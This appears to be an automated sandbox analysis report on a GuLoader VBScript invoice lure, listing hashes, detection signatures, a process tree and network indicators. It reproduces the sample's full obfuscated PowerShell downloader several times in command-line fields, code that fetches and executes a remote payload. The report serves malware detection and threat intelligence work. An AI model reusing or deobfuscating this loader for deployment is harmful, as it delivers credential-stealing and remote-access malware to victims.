Windows Analysis Report
INVOICE_DF76K.vbs

Overview

General Information

Sample name:INVOICE_DF76K.vbs
Analysis ID:1500268
MD5:af84a827601b117c89f0fe2a30604669
SHA1:6844a66c86b23a67429aee33094ba33bc9c61fe6
SHA256:48c37299c9515e8cf91ff1faa09135014ae7303a88aea29e1d2298398200617f
Tags:vbs

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6184 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 4432 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 1600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. 
imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl 
Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5368 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5572 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3 Di.=TheoNPenseAttewEl c-TipsOAnombSygnj Alhe ampc.aiptS.ri ForbS arry LibsFliptPerne,tavm Pro.LaviNSchneI.dbtSwee. nstWMetaeBaalbIganCSnedl Tolit,mmeC ntnHag,t');$Pickett+=$anflyvning[1];Kreditorselskabs ($Pickett);Kreditorselskabs (konstruktive 'Udvi$ZofiKexpeoAlamnKolok B,iuDaltrStrar ToleD iznLupic.owee ethmdrugsClocsDiali afagPa.ieStatsAnti1Chry3Advo3Rep,. 
imoH,geneUh.ga M ddgayneLattrG,ldsKonj[Udsk$AquaBCo,ueass,g,eceaW.irzJu,eeBioes Sho]Sold=Cpah$ AchbErmilAttayDiasiMestnB.bbdKogehI,exo roslclifd Rals sho ');$Grnseovergangs=konstruktive 'Bure$ T.pK Spao,iqunAllik.vveuunsmrDiserGra eIntenAnimca.rbe ivtmIsobsSludsRiggi A.lgskomeSynasO.lo1 Brs3Rej 3Mund.Fol.DEkspoBolvw.revnA,lolIncoosquiaPalsdRedrFneeliOverlF rge,ane(Sti $,unjIDu.fdDi.mePrstoDagugGr.srJappaKlovmKen mSameeSpr,rKonvnT xpeSky ,Siry$ DivCA,ealSub,iWochn Lowo .herKremhA icoC,asm CrobQu.niCotscAsso)Smrk ';$Clinorhombic=$anflyvning[0];Kreditorselskabs (konstruktive 'Flav$Hig,gThe.lB.ckoSeasb Mora Ampl ine: Sk.LFrdie UsanUdbygPod,tUndehCooni ,ileVu,csButttBo.t= Gil(ReveTInthe El.s Sp.tOutr-DermPStiraLimbt ComhOxyh Indu$UnscCPhanl DesiSquanEgunoAgerr naahForbo B.nmFirebDehuixyl,cSam,)Morg ');while (!$Lengthiest) {Kreditorselskabs (konstruktive '.rih$ orsgK allBlano Prab,ppeaOp rl hex:TranF leyo BanrGennbShi l igdS.altS,vnemagns.mor= nab$LnudtSti rAgtbu KineDiss ') ;Kreditorselskabs $Grnseovergangs;Kreditorselskabs (konstruktive ' RaaSCatat Thia.ejsrDevet Bet-MorbSGen l eleD.baeAttepTall N.nv4Ydre ');Kreditorselskabs (konstruktive 'Over$Ga,vgBogslUnphoPel.b.hahaIagtlOmfa:Me dL UlyeBu,onSubtgAutot D thUnapi Fe eMiscs Fort Ih = Rat(BrisTBaade JarsSnoht.ffa- N hPMotla P,et V,ahL,ka Til$ TonCKolllbestiDueln Ve,oOperrSkr,hUsaeo D,em.alib UneiEleccUdbu) Arb ') ;Kreditorselskabs (konstruktive ' The$,mdegKonsl lboOliebGeneaFngsl ini:TermO Kl.p.ohrtCramearabg,risnDodmeNedbdUdbue Arg=Unwa$ ,jogSemelPerio Sk b Flaa.hefl Imm:.rewDAmmarOrtiuUlejn FlagNonuaFormr S.e+Fai,+Unga%,abe$S.amV dske PannTranaUnsilAnosnDitaeStensCivisdisc.KalkcB.dioArteuKaldnBromtBogt ') ;$Ideogrammerne=$Venalness[$Optegnede];}$Differ=319698;$Cameroonian=28765;Kreditorselskabs (konstruktive 'Pa.h$ ikgUncol feroTritbHoeja.onelSlut: .ncUM.trnF rmf,exeokiwilNam,d AfraRuefbSpinlSquieOrdr Su s=D.ri engdGAkt,e AzotSet,- GenCDecooViran vigt Fi e StenU satKons Jeaa$KommCG,psl 
Pa,iTebrnAnnuo.unkrSqu.hGuldoSabbm .arb Ep,iOv.rcanod ');Kreditorselskabs (konstruktive 'nog.$ rhvgThaylVrdio AffbLallaHaymlRhym:TurkOThelpAlpasBreeaVi amomsklhaariMil nSanggchelsProgbSkole,orhhLilloSagalSukkdGovee AvlrGtteeRabb Du e=Aarm Omkl[O,ciSFalsyD,dosSugetForre p,emFrib. NorCTa uoHuben AntvT llePromrL.tet.nop]Swai: Aus:MenaF SdurShifoB,rom MedBbureaMonosG raeW st6 mil4FstoSM,ustEnsorDogmiBrddnFlo,gSpnd( Tv $deduUUnimnSym fRaasoEl,cl .ekdBunnaUka.bRocklRe.reUn.i)Fors ');Kreditorselskabs (konstruktive ' Una$Su,egsul.lf.ldoFarmbMythaP,eslDust: HybSDe,etBestrScl mFo,efBan oc onrLynsdDemoe S,nl ndeDobbrGnideBurr ,pop= R f Leas[PsoaS comyBipes h,bt UdgeMycem Scu. ollTW iseDiabxNonrtRati.ZymoE.andnFaldc E,poPawndSikkiTr.nn K,sgInge]Papu:Hige:SyllA luvS TerCBro.I nbrI,den. marGTitueUdbrtPattSCeretVizirFdekiAmarnSp.ng ,ut(Synt$ImprOEn.opAnemsSubcaAllomblinlTuchiHenwn SydgRutss leb.ermeAfbrh Unioskr l tredB.lfeAnomrSkoveYder)Lynx ');Kreditorselskabs (konstruktive 'Kupl$parogU,bul Indo.ksabForsaDrejlNyma: f rUBrtsnObjedSdnieHicktHjemeTrear As,mPyoci Vaandecla rojtUn,richemo.tatnSorr=Vulc$OpklSInfotAchrrClanm,ateferkeoelecrTor.d .vae FunlAcese SacrVid,e,ema.TatasSel.uSku bOthesTzartLegarDodoinvn,nSorggKon,(I,ea$Ku sDbrejiDokufForwfU dae.ebarlinj,E.te$ AppCforhaNovemLydkeBortr U.ioVinio C,engrnniViziaT.synMa t)Lip ');Kreditorselskabs $Undetermination;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6500 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3337285382.0000000008D80000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000007.00000002.3337411783.000000000C8EC000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000007.00000002.3322827054.00000000060CE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 1600 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Source | Rule | Description | Author | Strings
amsi64_1600.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_5572.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xe21d:$b2: ::FromBase64String(
  • 0xd283:$s1: -join
  • 0x6a2f:$s4: +=
  • 0x6af1:$s4: +=
  • 0xad18:$s4: +=
  • 0xce35:$s4: +=
  • 0xd11f:$s4: +=
  • 0xd265:$s4: +=
  • 0x16bdd:$s4: +=
  • 0x16c5d:$s4: +=
  • 0x16d23:$s4: +=
  • 0x16da3:$s4: +=
  • 0x16f79:$s4: +=
  • 0x16ffd:$s4: +=
  • 0xdab8:$e4: Get-WmiObject
  • 0xdca7:$e4: Get-Process
  • 0xdcff:$e4: Start-Process
  • 0x1788d:$e4: Get-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", ProcessId: 6184, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE_DF76K.vbs", ProcessId: 6184, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicSkr,eGrubm Fors ProsMiskiTjregAyl.e DatsSerr1Pect3Todk3
              No Suricata rule has matched

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
Source: unknown | HTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View | IP Address: 185.221.216.115 185.221.216.115
Source: Joe Sandbox View | IP Address: 185.221.216.115 185.221.216.115
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
